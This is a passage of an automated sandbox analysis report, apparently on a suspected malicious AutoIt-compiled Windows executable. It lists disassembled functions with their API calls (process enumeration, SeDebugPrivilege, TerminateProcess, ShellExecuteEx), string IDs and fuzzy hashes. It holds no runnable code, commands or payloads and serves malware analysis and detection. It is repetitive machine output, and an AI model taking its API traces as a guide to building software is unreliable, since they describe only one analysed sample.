                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                    • String ID:
                                    • API String ID: 2014098862-0
                                    • Opcode ID: 6a64a619d4d7457ad3cdf316d5e5093193593cccfa54e656a467a73936dcd649
                                    • Instruction ID: 82b787bee3e20566f2b26fe2045aec86a267887f822155270077ecac2660eab2
                                    • Opcode Fuzzy Hash: 6a64a619d4d7457ad3cdf316d5e5093193593cccfa54e656a467a73936dcd649
                                    • Instruction Fuzzy Hash: 3E1121B1964208BEF7202F24DC89F6A3F2DEB0C751F200026F644AB1A0C9F35D40EAE4
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,008D853C,00000B00,?,?), ref: 008D892A
                                    • RtlAllocateHeap.NTDLL(00000000,?,008D853C), ref: 008D8931
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008D853C,00000B00,?,?), ref: 008D8946
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,008D853C,00000B00,?,?), ref: 008D894E
                                    • DuplicateHandle.KERNEL32(00000000,?,008D853C,00000B00,?,?), ref: 008D8951
                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,008D853C,00000B00,?,?), ref: 008D8961
                                    • GetCurrentProcess.KERNEL32(008D853C,00000000,?,008D853C,00000B00,?,?), ref: 008D8969
                                    • DuplicateHandle.KERNEL32(00000000,?,008D853C,00000B00,?,?), ref: 008D896C
                                    • CreateThread.KERNEL32(00000000,00000000,008D8992,00000000,00000000,00000000), ref: 008D8986
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                    • String ID:
                                    • API String ID: 1422014791-0
                                    • Opcode ID: 0c08a619e1327b1ef6e532f2897bc947290fb689c68756131701d5095f561d0b
                                    • Instruction ID: c873623f190b0d98c1924b6f2df4a15cb3ed383dd707f9c507735c1ab5fbb568
                                    • Opcode Fuzzy Hash: 0c08a619e1327b1ef6e532f2897bc947290fb689c68756131701d5095f561d0b
                                    • Instruction Fuzzy Hash: 2601BF75254304FFE760EBA5DC5DF673B6CEB89B11F404421FA05DB691CA749900DB20
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: NULL Pointer assignment$Not an Object type
                                    • API String ID: 0-572801152
                                    • Opcode ID: 8bfcd990383acfeaca10e5c3853b6029d4b250520ff2a4da73bfffb02e3c7927
                                    • Instruction ID: cf26c009ca133013ae227f0f7349c27364ce9f02406d5fcf542df790a650bb49
                                    • Opcode Fuzzy Hash: 8bfcd990383acfeaca10e5c3853b6029d4b250520ff2a4da73bfffb02e3c7927
                                    • Instruction Fuzzy Hash: C8C18E71A0021E9BDF10DFA8D884BBEB7F5FB48314F158569EA45EB280E770AD45CB90
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$_memset
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                    • API String ID: 2862541840-625585964
                                    • Opcode ID: cc94f0d1e4406806e20258f9e36eb42ea07119a9af4f3503eddba116f1917dcd
                                    • Instruction ID: 9734928b59954253afbfd7191d19730329180a8f6289c3cce1f276200ad3a1a4
                                    • Opcode Fuzzy Hash: cc94f0d1e4406806e20258f9e36eb42ea07119a9af4f3503eddba116f1917dcd
                                    • Instruction Fuzzy Hash: 92919C31A00219ABDF24DFA5C848FAEBBB8FF85714F108159FA55EB280D7709941CFA0
                                    APIs
                                      • Part of subcall function 008D710A: CLSIDFromProgID.COMBASE ref: 008D7127
                                      • Part of subcall function 008D710A: ProgIDFromCLSID.COMBASE(?,00000000), ref: 008D7142
                                      • Part of subcall function 008D710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D7044,80070057,?,?), ref: 008D7150
                                      • Part of subcall function 008D710A: CoTaskMemFree.COMBASE(00000000), ref: 008D7160
                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 008F9806
                                    • _memset.LIBCMT ref: 008F9813
                                    • _memset.LIBCMT ref: 008F9956
                                    • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 008F9982
                                    • CoTaskMemFree.COMBASE(?), ref: 008F998D
                                    Strings
                                    • NULL Pointer assignment, xrefs: 008F99DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 1300414916-2785691316
                                    • Opcode ID: e04d5f7b375ccfed5c4e756f52082665a2b1db6e9bd2faae855527b849c32fce
                                    • Instruction ID: 1ff2657351866c6cf25d3b0f368b3d758454809d0dfc0a10cca5e2975ee98cca
                                    • Opcode Fuzzy Hash: e04d5f7b375ccfed5c4e756f52082665a2b1db6e9bd2faae855527b849c32fce
                                    • Instruction Fuzzy Hash: C291077190022DEBDB10EFA5DC45AEEBBB9FF08310F20415AE519E7251EB719A44CFA1
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00906E24
                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00906E38
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00906E52
                                    • _wcscat.LIBCMT ref: 00906EAD
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00906EC4
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00906EF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window_wcscat
                                    • String ID: SysListView32
                                    • API String ID: 307300125-78025650
                                    • Opcode ID: 9222dddb911122623f21fecd6e9e91351e29ca2a6ba62d70e426089afcc74aee
                                    • Instruction ID: e6b6f11ce3321ac49e8d44ca20621ab425acf6dbe77e6a707b4163e3cf9f5150
                                    • Opcode Fuzzy Hash: 9222dddb911122623f21fecd6e9e91351e29ca2a6ba62d70e426089afcc74aee
                                    • Instruction Fuzzy Hash: 48419E71A00349AFEB219FA8CC85BEA77ECEF08354F10052AF584E72D1D7729D958B60
                                    APIs
                                      • Part of subcall function 008E3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 008E3C7A
                                      • Part of subcall function 008E3C55: Process32FirstW.KERNEL32(00000000,?), ref: 008E3C88
                                      • Part of subcall function 008E3C55: CloseHandle.KERNEL32(00000000), ref: 008E3D52
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008FE9A4
                                    • GetLastError.KERNEL32 ref: 008FE9B7
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008FE9E6
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 008FEA63
                                    • GetLastError.KERNEL32(00000000), ref: 008FEA6E
                                    • CloseHandle.KERNEL32(00000000), ref: 008FEAA3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    • Opcode ID: 0a6944da31f5c339c5044cba490598265e045641d17b03e33ca5cc085d3aa820
                                    • Instruction ID: 2be5d21f8b34986b737efaa28283e19b6aab188e587e2202754e0c2fbf9bd293
                                    • Opcode Fuzzy Hash: 0a6944da31f5c339c5044cba490598265e045641d17b03e33ca5cc085d3aa820
                                    • Instruction Fuzzy Hash: 634179712042059FDB24EF28CCA5F79B7A5FF54314F188419FA42DB2D2DB74A944CB92
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 008E3033
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    • Opcode ID: c99ff7bfb5dace223d491681c501ad412b39b990442ee96564f35cfc08ae5953
                                    • Instruction ID: 23879b0515ea595385b64f32ddca98c549ac6fecdce46f3d9a5358ec71a1ab7c
                                    • Opcode Fuzzy Hash: c99ff7bfb5dace223d491681c501ad412b39b990442ee96564f35cfc08ae5953
                                    • Instruction Fuzzy Hash: DC1108313487C6BEE7259A1ADC46C6B779CFF17324F10006AF900E7582DAA09F4059A1
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008E4312
                                    • LoadStringW.USER32(00000000), ref: 008E4319
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008E432F
                                    • LoadStringW.USER32(00000000), ref: 008E4336
                                    • _wprintf.LIBCMT ref: 008E435C
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008E437A
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 008E4357
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wprintf
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 3648134473-3128320259
                                    • Opcode ID: 5292ea87dfe831a577b8997a12b94da87eaa39e0981ccf430ebb9ca3c2a06b35
                                    • Instruction ID: abc2cfd65754d82e2e6177d93dc2940a2748f8b9c8e53cd60dce4851babacced
                                    • Opcode Fuzzy Hash: 5292ea87dfe831a577b8997a12b94da87eaa39e0981ccf430ebb9ca3c2a06b35
                                    • Instruction Fuzzy Hash: E90128F290420CBFE761ABA49D89EEB766CEB08300F0005A1BB49E2451EA759F855B71
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008BC1C7,00000004,00000000,00000000,00000000), ref: 00882ACF
                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,008BC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00882B17
                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,008BC1C7,00000004,00000000,00000000,00000000), ref: 008BC21A
                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008BC1C7,00000004,00000000,00000000,00000000), ref: 008BC286
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: bddd8c3f27665800d1939267297e195abfaec61d0c771e5d350f702eadb9e20a
                                    • Instruction ID: 3708ad55503a3355ed7474b0447cd264dc8e2e572a7d1ad18316094ec2558d6f
                                    • Opcode Fuzzy Hash: bddd8c3f27665800d1939267297e195abfaec61d0c771e5d350f702eadb9e20a
                                    • Instruction Fuzzy Hash: D8411634218694EFC73DAB28CC98BAF7B96FF85314F148829E057C6A61C631A841D711
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 008E70DD
                                      • Part of subcall function 008A0DB6: std::exception::exception.LIBCMT ref: 008A0DEC
                                      • Part of subcall function 008A0DB6: __CxxThrowException@8.LIBCMT ref: 008A0E01
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008E7114
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 008E7130
                                    • _memmove.LIBCMT ref: 008E717E
                                    • _memmove.LIBCMT ref: 008E719B
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 008E71AA
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008E71BF
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 008E71DE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 256516436-0
                                    • Opcode ID: fce9ebed4c6aa178dd892d196a6d4b9adbf5a9b672b839fabb8f20272f5570ad
                                    • Instruction ID: f061fe66ba1888f39f46589423558dfb9a001f2d6187aa3ed6573f742df7d7ba
                                    • Opcode Fuzzy Hash: fce9ebed4c6aa178dd892d196a6d4b9adbf5a9b672b839fabb8f20272f5570ad
                                    • Instruction Fuzzy Hash: 96315E32904205EFDF10EFA9DC85AAAB7B8FF46710F1441A5E904EB256DB709A10DB61
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 009061EB
                                    • GetDC.USER32(00000000), ref: 009061F3
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009061FE
                                    • ReleaseDC.USER32(00000000,00000000), ref: 0090620A
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00906246
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00906257
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0090902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00906291
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009062B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    • Opcode ID: 40aaa623055ffbafb55da7038544bb66a572fc2851f088660390f7eb043c8ff9
                                    • Instruction ID: baee54af6f3a81cc944aec14bd5c0fc8a26289daface0f04077a39844e3822a8
                                    • Opcode Fuzzy Hash: 40aaa623055ffbafb55da7038544bb66a572fc2851f088660390f7eb043c8ff9
                                    • Instruction Fuzzy Hash: 0F317A72214214BFEF208F14CC8AFAA3BADEF4A765F044065FE08DA291C7759951CBA0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: 503316875de1510b59ca7aeddad7f3bf1171db50915a06a9239db53110a22f53
                                    • Instruction ID: 1e10bf157240f10f3b0986fdc7ea64614528d58ad572cc1de3449335ca244d13
                                    • Opcode Fuzzy Hash: 503316875de1510b59ca7aeddad7f3bf1171db50915a06a9239db53110a22f53
                                    • Instruction Fuzzy Hash: EF21BD61702209AAAA0476299D42FFB735DFF5535CF054122FD05D6B43EB24DE2083A6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8a3306f1c2689daed92d67a9ee12de313c5d125dca2f665366a92fecdb0e2ea4
                                    • Instruction ID: b7bb1d6028a0746a4fda0701b8f079ab50524a39d32294f9fa5b5529fb5d93f3
                                    • Opcode Fuzzy Hash: 8a3306f1c2689daed92d67a9ee12de313c5d125dca2f665366a92fecdb0e2ea4
                                    • Instruction Fuzzy Hash: D5717C30904109EFCF14DF98CC48ABEBB79FF85314F148159F915EA251CB34AA52CBA8
                                    APIs
                                    • IsWindow.USER32(01562660), ref: 0090B3EB
                                    • IsWindowEnabled.USER32(01562660), ref: 0090B3F7
                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0090B4DB
                                    • SendMessageW.USER32(01562660,000000B0,?,?), ref: 0090B512
                                    • IsDlgButtonChecked.USER32(?,?), ref: 0090B54F
                                    • GetWindowLongW.USER32(01562660,000000EC), ref: 0090B571
                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0090B589
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                    • String ID:
                                    • API String ID: 4072528602-0
                                    • Opcode ID: c5d70b793106cf5f7c38877b588843844acaa3eb13030a45fca3b830ac6077f5
                                    • Instruction ID: ec9e909ef6d55a922f363f2cbaa06a4247a331dff847f6fc240669daa5642719
                                    • Opcode Fuzzy Hash: c5d70b793106cf5f7c38877b588843844acaa3eb13030a45fca3b830ac6077f5
                                    • Instruction Fuzzy Hash: C6718D34605204EFDB209F54C8A4FBABBBAEF49300F144569FA55972E2C732AA41DB50
                                    APIs
                                    • _memset.LIBCMT ref: 008FF448
                                    • _memset.LIBCMT ref: 008FF511
                                    • ShellExecuteExW.SHELL32(?), ref: 008FF556
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
